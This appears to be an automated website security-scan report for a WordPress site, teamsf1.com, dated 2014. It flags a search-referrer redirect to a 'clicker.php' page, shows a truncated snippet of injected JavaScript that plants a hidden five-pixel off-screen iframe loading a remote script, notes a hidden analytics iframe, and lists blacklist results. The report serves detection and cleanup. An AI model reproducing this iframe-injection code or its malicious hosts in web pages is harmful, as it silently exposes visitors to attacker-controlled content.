Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://teamsf1.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: teamsf1.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 12 Sep 2014 22:01:17 GMT Location: http://shinwa-ind.jp/clicker.php Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://teamsf1.com/ | 200 OK Content-Length: 15458 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hhmpp09() { var static='ajax'; var controller='index.php'; var hhmpp = document.createElement('iframe'); hhmpp.src = 'http://nkbk1.presenthost.net/wbdfCMxk.php'; hhmpp.style.position = 'absolute'; hhmpp.style.color = '5'; hhmpp.style.height = '5px'; hhmpp.style.width = '5px'; hhmpp.style.left = '10005'; hhmpp.style.top = '10005'; if (!document.getElementById('hhmpp')) { document.write('<p id=\'hhmpp\' class=\'hhmpp09\' ></p>'); document.getElementById('hhmpp').appendChild(hh Antivirus reports:
| ||
http://teamsf1.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-includes/js/hoverIntent.js?ver=20090102 | 200 OK Content-Length: 1334 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-content/plugins/multi-level-navigation-plugin/scripts/superfish.js?ver=1.4.8 | 200 OK Content-Length: 2803 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-content/plugins/multi-level-navigation-plugin/scripts/superfish_settings.js.php?ver=1.0 | 200 OK Content-Length: 387 Content-Type: text/javascript | clean |
http://teamsf1.com/wp-content/themes/gemer/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-content/themes/gemer<script type= | 404 Not Found Content-Length: 356 Content-Type: text/html | clean |
http://teamsf1.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://teamsf1.com/wp-content/themes/gemer/js/script.js | 200 OK Content-Length: 595 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://free.stiqr.com/sticker/api | 200 OK Content-Length: 117515 Content-Type: text/javascript | suspicious |
Hidden iFrame found. style: hidden src: http://www.stiqr.com/analytics <iframe src='http://www.stiqr.com/analytics' style='display:none;'> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=teamsf1.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://teamsf1.com/
Result: teamsf1.com is not infected or malware details are not published yet.
Result: teamsf1.com is not infected or malware details are not published yet.